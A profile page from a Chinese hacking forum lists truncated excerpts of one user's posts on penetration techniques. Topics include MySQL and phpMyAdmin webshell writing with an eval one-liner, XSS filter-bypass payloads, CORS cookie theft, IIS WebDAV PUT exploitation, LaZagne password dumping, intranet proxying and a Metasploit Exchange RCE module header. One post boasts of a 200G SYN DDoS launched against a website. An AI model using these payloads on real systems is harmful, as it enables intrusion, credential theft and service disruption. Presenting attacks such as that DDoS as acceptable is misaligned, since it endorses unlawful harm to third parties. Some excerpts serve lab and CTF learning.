Jump to content
请先注册账号再浏览本站!Maak een account aan voordat u deze site bezoekt!

H4CK

Moderators
  • Content Count

    28
  • Joined

  • Last visited

  • Days Won

    2
  • Donations

    $0.00 

H4CK last won the day on July 22

H4CK had the most liked content!

Community Reputation

6 Neutral

5 Followers

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. MySQL 是世界上最流行的关系型数据库管理系统,在 WEB 应用方面 MySQL 是最好的 RDBMS(Relational Database Management System:关系数据库管理系统)应用软件之一。全球很多著名公司和站点都使用Mysql作为其数据库支撑,并且很多架构都以Mysql作为数据库管理系统,例如LAMP、和WAMP等,在针对网站渗透中,很多都是跟Mysql数据库有关,各种Mysql注入,利用Mysql来getshell、Mysql提权,等等。本文,笔者我对Mysql在渗透测试中的常见的基础利用进行了详细的总结,包括利用MySQL获取webshell、MySQL提权以及几个MySQL的0day漏洞等。 MySQL相关信息收集 不管是你渗透什么玩意儿,信息收集都是首要的一步。在行动之前,我们需要搞清楚,目标主机上是否存在MySQL、MySQL运行在默认的端口还是指定的端口、MySQL的版本信息、MySQL用户信息等等。 Mysql默认端口是3306端口,但也有自定义端口,针对默认端口扫描主要利用扫描软件进行探测。我们可以用nmap等端口扫描工具对MySQL的端口进行扫描。 如果已经获得了目标MySQL的密码,我们可以使用该用户名和密码扫描获取指定IP地址的端口信息以及mysql数据库相关信息:
  2. AWVS是一款自动化应用程序安全测试工具,支持windows平台,主要用于扫描web应用程序上的安全问题,如SQL注入,XSS,目录遍历,命令注入等 xray (https://github.com/chaitin/xray) 是从长亭洞鉴核心引擎中提取出的社区版漏洞扫描神器,支持主动、被动多种扫描方式,自备盲打平台、可以灵活定义 POC,功能丰富,调用简单,支持 Windows / macOS / Linux 多种操作系统,可以满足广大安全从业者的自动化 Web 漏洞探测需求。 awvs 的爬虫很好用,支持表单分析和单页应用的爬取,xray 的扫描能力比较强,速度也更快。 这里简单说明一下如何实现二者联动自动批量扫描漏洞,过程比较简单,xray官方文档里也有介绍,awvs批量扫描脚本也是直接拿的网上某位表哥的(感谢表哥的脚本~),我只是记录一下学习的过程。 首先打开xray的被动代理 xray.exe webscan --listen 127.0.0.1:7777 --html-output report.html 这条命令监听本地7777端口,然后以html格式将扫描结果导出,文件名为report.html 这里先说
  3. XSS的fuzz payload字典 CORS CORS(corss orgin request sharing) 属于浏览器特性,用来实现跨域请求的。 https://medium.com/@baphemot/understanding-cors-18ad6b478e2b 1.盗取httponly cookie 2.缓存投毒 3.cookie炸弹 4.水坑攻击 盗取httponly cookie 设置httponly: setcookie("abc", "test", NULL, NULL, NULL, NULL, TRUE); //php 当网站使用了httponly的时候,会限制js读取cookie. 利用cors窃取cookie的条件: 服务器端进行设置: 设置Access-Control-Allow-Origin:xxx.com时 设置了Access-Control-Allow-Credentials:true 然后再寻找一个存在xss的并且允许跨域的域名来进行攻击。 主要利用代码就是一个XHR的一个异步请求。其中最重要的就是一定要设置 xhr1.withCredentials = true; 这样才会在跨域请求的时候带上cookie. <script >
  4. LadonExp生成器使用教程之IIS写权限漏洞利用,含环境配置、EXP生成、批量利用、Pyhton复现代码。 漏洞成因 该漏洞的产生原因来源于服务器配置不当造成,此漏洞主要是因为服务器开启了webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。 IIS配置 1 启用webdav组件 2 目录给写权限(为了方便直接eveyone完全写入权限) 3 脚本资源访问权限(不然MOVE失败即无法GetShell) 漏洞复现 使用LadonEXP可轻松复现此类漏洞,在Ladon改名前(Cscan)已复现过Tomcat,详情参考Tomcat CVE-2017-12615视频: https://github.com/k8gege/K8CScan/tree/master/Video LadonExp配置PUT 功能:上传123.TXT Target: http:/
  5. 根据题目Knife 猜想尝试用蚁剑连接 http://40b92ebd-5234-40b7-b2e0-3c42fb5ad000.node3.buuoj.cn/?Knife.php 密码:Syc 找到flag emmm确实白给的shell..
  6. xss原理 xss产生的原因是将恶意的html脚本代码插入web页面,底层原理和sql注入一样,都是因为js和php等都是解释性语言,会将输入的当做命令执行,所以可以注入恶意代码执行我们想要的内容 xss分类 存储型xss: js脚本代码会插入数据库,具有一定的持久性 反射型xss: js经过后端php等语言处理 dom型xss: 和反射型xss类似,但是不经过后端服务器的处理xss绕过总结:自身绕过<script>alert('xss')</script> //没有过滤 <Script>alert('xss')</Script> //大小写绕过 <scscriptript>alert('xss')</scscriptript> //嵌套绕过 <sc\x00ript>alert('xss')</sc\x00ript> //空字节绕过 " oonnclick=alert('XSS') // //闭合单双引号绕过(对于html实体输入的和过滤< >) 其他标签绕过 <a herf="javascript:alert(1)">s
  7. 什么是cookie cookie是曲奇饼,啊开个玩笑,cookie是每个用户登录唯一id和账号密码一样可以登录到网站,是的你没有听错cookie可以直接登录,至于服务器怎么设置cookie 和cookie存储这里就不说了,需的要自行百度 xss盗取cookie(dvwa演示) 学习xss时觉得啊这,不就是一个弹窗吗,有啥用,经过学习后发现xss的危害还是挺大的,弹窗的目的只是说明这里可以执行动态脚本,那就可以干很多事情了 环境配置 官网:http://www.dvwa.co.uk/ 下载地址:https://github.com/ethicalhack3r/DVWA 下载方式:zip下载或git https://github.com/ethicalhack3r/DVWA 下载完成放入http服务下即可 我使用的是phpstudy下载地址:https://m.xp.cn/ 设置接受盗取cookie方式 xss盗取的cookie肯定是要保存到我们自己的服务器上,可以设置一个接受cookie的php网页代码接受到请求携带cookie后保存到文件或者数据库中等都可以,当然也可以不设置存储,随便请求一个一个服务器网
  8. (Web安全防御、渗透测试、逆向破解可添加QQ 75960992 ) 导语: 利用SQL注入进行攻击来获取WebShell其实就是在向服务器写文件。(注意:这里我们需要得到网站的绝对路径)如何理解?引入余弦老哥的一句话: 黑客通过输入提交“特殊数据”,特殊数据在数据流的每个层处理,如果某个层没处理好,在输出的时候,就会出现相应层的安全问题。 也就是“输入输出”,余弦老哥举的这个例子就很精彩! 如果在存储层的数据库中没处理好,数据库的SQL解析引擎把这个“特殊数据”当做指令执行时,就产生SQL注入这样的安全问题,这段“特殊数据”可能长得如下这般: ' union select user, pwd, 1, 2, 3, 4 from users-- 为什么要进行SQL注入WebShell? 在所有常用的关系数据库管理系统(RDBMS)中均包含内置的向服务器文件系统写文件的功能,通过这些内置的功能,我们可以将自己的WEBshell写目录或文件进去。 什么是web shell? Web shell 我们可以把他拆开来看,web就是指在web服务器上,shell指的是用脚本语言编写的程序,那么,web shell就是用来管理服务器的一个工具,拥有对服务器进行操作的权限,又被称作web admin。
  9. 0x00前言 在拿到一台服务器的shell的时候,如果想要更进一步渗透测试,则需要进行内网渗透 而内网渗透的第一步就是挂代理,首先需要明确一个概念,在日常生活中常用vpn挂代理去google查资料,自己搭过vpn的人都知道,要在买的vps上搭建ss的服务器端,之后在自己电脑上下载ss的客户端,确定对应的加密协议和密码就能成功转发 而在内网渗透的流量转发是一个道理,是在拿到shell的服务器上使用工具让它变成代理的服务器端,之后在本机使用客户端工具进行连接 0x01流量转发工具 需要放在拿到shell的服务器的服务器端可使用 1.lcx 2.msf 3.cobalt Strike 4.earthworm 5.reGeorg 本地的客户端可以使用 windows 1.proxifier 2.SocksCap64 linux 1.proxychains 0x02 本次测试的环境 本次环境是公司搭的一个一层内网
  10. 使用laZagne来抓取密码 什么是laZagne呢,它是一个Pythono编写的一个很强大的密码抓取工具,有名的工具比如mimikatz,但是只能限于windwos情况下进行抓取,并且对于免杀方面的工作还要我们自己来做(但是msf等后渗透工具已经集成了,相对说利用较为方便)。 相对于laZagne来说就要差一点,因为它不仅支持跨平台,又因为使用python进行编译的,免杀的效果就相对于mimikatz来说就强一点。 项目地址 下载并且进行编译: 支持语言:Python2.x 先安装Python的模块 pip install pyinstaller 下载项目 git clone https://github.com/AlessandroZ/LaZagne.git 之后进入对应的文件夹(MAC/Linux/win) 进行编译 pyinstaller --onefile -w lazagne.py 然后就运行 laZagne.exe all就会枚举出浏览器存储的密码(我的浏览近百条明文密码都被抓取到了),至于想要抓取系统的密码hash就需要管理员的权限(mimikatz也是一样的),这个就不提这个了。 关于la
  11. 先我们用诸如下图的谷歌语法比如:inurl:index.php intitle:phpMyAdmin 以及shoudan,钟馗之眼等可以再网上搜到一大批暴露的phpmyadmin,看到个文章讲的比较详细https://blog.csdn.net/weixin_44023460/article/details/84925950 我们可以尝试弱口令爆破 ,爆破工具:http://ximcx.cn/post-49.html 进入phpmyadmin后首先用SHOW GLOBAL VARIABLES LIKE ‘%general%’;查询general_log功能是否开启,如果没有开启,我们用set global general_log=’on’ 把它开启 我们要想用sql 上传一句话木马就得知道网站的绝对路径,着要靠我们前期的信息收集,许多网站也会暴露phpinfo信息,在phpinfo里面我们可以看到绝对路径,类似的途径还有报错信息,以及其他暴露的配置文件等等 知道绝对路径我们可以使用 set global general_log_file=’/www/admin/localhost_80/wwwroot/ssr.php’;SELECT ‘<?php eval($_POST["ssr"]);?>
  12. (渗透测试、APP逆向破解 合法等保操作等可以加Qq合作 75960992) 0X00 前言 团队A师傅发来个站,问我有没有得搞 正好在搞其他的站,卡住了,开干换个思路。 0x01 信息收集 开burp抓了下包,目标设置了url重写,开了报错,我们随意输入一个控制器就直接报错。 获取到web绝对路径。 抓包发现这样的请求 随手试了一下burpsuite的dnslog,发现请求过去并回显了,猜测后端使用file_get_contens来获取。 一个可回显ssrf,有什么用呢? 打内网? 尝试file协议,尝试读取文件,发现可以读。 但发现返回的内容不完整,猜测有截断,用php://filter协议base64编码一下绕过读取。 解码 有一个任意文件读取有什么用呢? 在这之前,其实是有用nmap扫了一下其他端口 开了挺多端口的,一个个测了一下发现999端口开着phpmy
  13. 大家好,我是论坛服务器的赞助商,我们做渗透测试及安保业务。我的QQ是 75960992 今天给大家带来一个故事,白嫖怪的QQ是115**281 看着是挺厉害的,做人不行。 起因:被金融诈骗公司诈骗了钱 他说是五十万 实际上我不知道是多少钱。 于是他说已经公安部立案,但进展不快。希望我们做一下 说是被骗了,希望我们能先做后付款。好的 我们演示能力给她看。 后面回到团队叫小伙伴一起找漏洞 发现三个漏洞 分别 注入XSS 另外就是后台登录的时候抓包可以直接跳过 不过里面权限不太够 需要提权操作。 这白嫖怪说的是让他停一周,去协商就行 于是我们用了简单的DD SYN 发出200G 直接就炸了。 下面看我操作图片 网站黑洞中的时候,他说需要面交,本来拒绝的,后面看到那么真诚 想帮他一把。他买票过来了 后面想着 他这种狗急跳墙的人应该不会善罢甘休。 没想到真的。这种狗急跳墙的人很容易出事,没让他来,他就说我不能做什么的。 后面自然是谈崩了,这种人真的没必要,说漏洞 说渗透 我叫人也做了,说干站 也干了,非得要提出这些无理的要求。我一毛钱没收到,还非得好像给了我几百万一
  14. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Powershell def initialize(info = {}) super( update_info( info, 'Name' => 'Microsoft Exchange Server DlpUtils AddTenantDlpPolicy RCE', 'Description' => %q{ This vulnerability allows remote attackers to execute arbitrary

Follow: 世界中文黑客论坛由CNHACKTEAM[CHT]创建,汇集国内外技术人员,这是一群研究网安黑客攻防技术领域的专家.

法务要求丨Legal丨закон丨القانون

请在学习期间遵守所在国家相关法律,否则后果自负!

Пожалуйста, соблюдайте законы страны, в которой вы находитесь, во время обучения, или будут последствия!

勉強期間中に該当する国の法律を守ってください。そうでなければ結果は自己責任です。

Please abide by the relevant laws of your country during your study, or you will be responsible for the consequences!

官方旗下项目丨About our project

声明:为净化国内外网络安全请勿发布违反国家国定的文章,团队不参与任何涉及黑色产业/攻击/渗透各国正规网站活动,只做网络安全研究,研究网络攻防技术。

世界中文黑客论坛由CNHACKTEAM(CHT)创建,汇集国内外技术人员,这是一群研究网络安全、黑客攻防技术领域的专家,你也可以加入我们!

黑客攻防  技术问答  0day  Hack News  CHT Team  使用指南  商城/Mall  商城订单查询  捐赠/donations  在线用户  X  联系邮箱email:[email protected]

友情链接丨Link丨Связь дружбы

CNHACKTEAM   CHT team official website     www.hac-ker.com     hacked.com.cn     www.77169.net     www.ddosi.com

申请或请未补上链接者联系我们的邮箱,谢谢!

×
×
  • Create New...

Important Information

Please use your computer to visit our website; Please agree to our website rules!Guidelines